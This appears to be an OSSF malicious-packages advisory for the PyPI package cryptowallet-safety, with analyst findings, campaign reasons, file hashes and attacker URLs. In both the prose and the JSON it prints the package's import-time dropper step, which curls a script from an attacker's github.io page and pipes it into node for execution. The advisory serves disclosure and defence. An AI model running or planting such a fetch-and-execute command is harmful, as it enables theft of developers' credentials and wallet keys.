mal-2026-4259
Vulnerability from ossf_malicious_packages
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (276a350e78e2602882e107586e33d617b3e392e3943c120d99d4213963d7fd9d)
On import cryptowallet_safety, the top-level __init__.py (lines 13-21) shells out to curl -sL https://ddjidd564.github.io/defi-security-best-practices/payloads/wallet-safety-check.js and pipes the response body directly into node -e for execution. The fetch is unpinned (mutable URL on a personal github.io site, not the package publisher's domain), unverified (no hash or signature check), executed in an alternate runtime (Node) bypassing Python install-phase sandboxes such as pip download / pip wheel / build isolation, and errors are swallowed silently. Any developer or CI system that imports this package executes whatever JavaScript the github.io account currently serves — content the attacker can change at any time. The package self-describes as a crypto-wallet safety helper, which makes the import-time dropper especially likely to land in environments handling wallet keys.
Source: kam193 (cd2f5a911cabd7312224175b40dfeaefc3ae0b83c21747f688e608cb1afd062f)
During import, the package downloads a remote JS script that then exfiltrates environment variables, dotenv files, crypto-wallet data and other sensitive information. It's part of a broader campaign across PyPI, npm and GitHub.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-05-eth-security-auditor
Reasons (based on the campaign):
- files-exfiltration
- exfiltration-env-variables
- crypto-related
- Downloads and executes a remote malicious script.
- exfiltration-crypto
- exfiltration-credentials
- CWE-506 - The product contains code that appears to be malicious in nature.
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"evidence_files": [
{
"path": "cryptowallet_safety/__init__.py",
"sha256": "2a49c49da89e10b0bc4391600857911c617f471908a8a6e0bc89b0ddd7a29bbc",
"tlsh": "08711035583a2969f342c07e08297249625c31c37d8d3c30ba9cf15a9fec079ecb66b8"
}
],
"package_integrity": [
{
"filename": "cryptowallet_safety-0.1.0-py3-none-any.whl",
"hashes": {
"blake2b_256": "e7996a5e56bb97cd47c5662c649045c1c72e6e0da11de4335ce42974dbf408cf",
"md5": "c8aca73bf3eb27e25dfb67fad2a050dd",
"sha256": "ebad1e3186132b2892da38a92fb38e0e6e697e53e080adb8d2fbb899b93dc8ec"
}
}
]
}
},
"package": {
"ecosystem": "PyPI",
"name": "cryptowallet-safety"
},
"versions": [
"0.1.0"
]
}
],
"credits": [
{
"contact": [
"actran@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
},
{
"contact": [
"https://github.com/kam193",
"https://bad-packages.kam193.eu/"
],
"name": "Kamil Ma\u0144kowski (kam193)",
"type": "REPORTER"
}
],
"database_specific": {
"iocs": {
"domains": [
"ddjidd564.github.io"
],
"urls": [
"https://ddjidd564.github.io/defi-security-best-practices/payloads/compliance-scanner-light.js",
"https://ddjidd564.github.io/defi-security-best-practices/payloads/risk-profiler.js"
]
},
"malicious-packages-origins": [
{
"id": "pypi/2026-05-eth-security-auditor/cryptowallet-safety",
"import_time": "2026-05-22T21:55:13.06737119Z",
"modified_time": "2026-05-22T21:31:52.286005Z",
"sha256": "cd2f5a911cabd7312224175b40dfeaefc3ae0b83c21747f688e608cb1afd062f",
"source": "kam193",
"versions": [
"0.1.0"
]
},
{
"id": "pypi/2026-05-eth-security-auditor/cryptowallet-safety",
"import_time": "2026-05-24T06:19:57.536326492Z",
"modified_time": "2026-05-22T21:31:52.286005Z",
"sha256": "3a4d7d7edd75dd9ba680a5a745dd9cfb9a6807ba1402568cbfee14ac2a2b6f1c",
"source": "kam193",
"versions": [
"0.1.0"
]
},
{
"id": "IN-MAL-2026-004255",
"import_time": "2026-05-26T05:52:14.775214994Z",
"modified_time": "2026-05-22T20:30:44Z",
"sha256": "276a350e78e2602882e107586e33d617b3e392e3943c120d99d4213963d7fd9d",
"source": "amazon-inspector",
"versions": [
"0.1.0"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (276a350e78e2602882e107586e33d617b3e392e3943c120d99d4213963d7fd9d)\nOn `import cryptowallet_safety`, the top-level `__init__.py` (lines 13-21) shells out to `curl -sL https://ddjidd564.github.io/defi-security-best-practices/payloads/wallet-safety-check.js` and pipes the response body directly into `node -e` for execution. The fetch is unpinned (mutable URL on a personal github.io site, not the package publisher\u0027s domain), unverified (no hash or signature check), executed in an alternate runtime (Node) bypassing Python install-phase sandboxes such as `pip download` / `pip wheel` / build isolation, and errors are swallowed silently. Any developer or CI system that imports this package executes whatever JavaScript the github.io account currently serves \u2014 content the attacker can change at any time. The package self-describes as a crypto-wallet safety helper, which makes the import-time dropper especially likely to land in environments handling wallet keys.\n\n## Source: kam193 (cd2f5a911cabd7312224175b40dfeaefc3ae0b83c21747f688e608cb1afd062f)\nDuring import, the package downloads a remote JS script that then exfiltrates environmental variables, dotenv files, cryptowallets data and other sensitive informations. It\u0027s part of a broader campaign across PyPI, NPM and Github.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-05-eth-security-auditor\n\n\nReasons (based on the campaign):\n\n\n - files-exfiltration\n\n\n - exfiltration-env-variables\n\n\n - crypto-related\n\n\n - Downloads and executes a remote malicious script.\n\n\n - exfiltration-crypto\n\n\n - exfiltration-credentials\n",
"id": "MAL-2026-4259",
"modified": "2026-05-26T05:55:05Z",
"published": "2026-05-22T20:30:44Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ddjidd564"
},
{
"type": "WEB",
"url": "https://github.com/ddjidd564/defi-security-best-practices/tree/gh-pages"
},
{
"type": "WEB",
"url": "https://ddjidd564.github.io/defi-security-best-practices/wallet-verify.py"
},
{
"type": "WEB",
"url": "https://github.com/orgs/modelcontextprotocol/discussions/761"
},
{
"type": "WEB",
"url": "https://bad-packages.kam193.eu/pypi/package/cryptowallet-safety"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/cryptowallet-safety/0.1.0/"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in cryptowallet-safety (PyPI)"
}